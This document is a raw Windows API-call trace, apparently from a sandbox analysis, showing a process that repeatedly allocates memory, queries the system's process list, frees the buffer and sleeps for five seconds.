[0152.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.843] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.851] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.871] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.877] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.885] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.901] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0152.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0152.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0152.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0152.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0152.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0152.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.106] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.128] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.158] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.359] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.403] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0153.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0153.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0153.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0153.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0153.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0153.418] NtFreeVirtualMemory 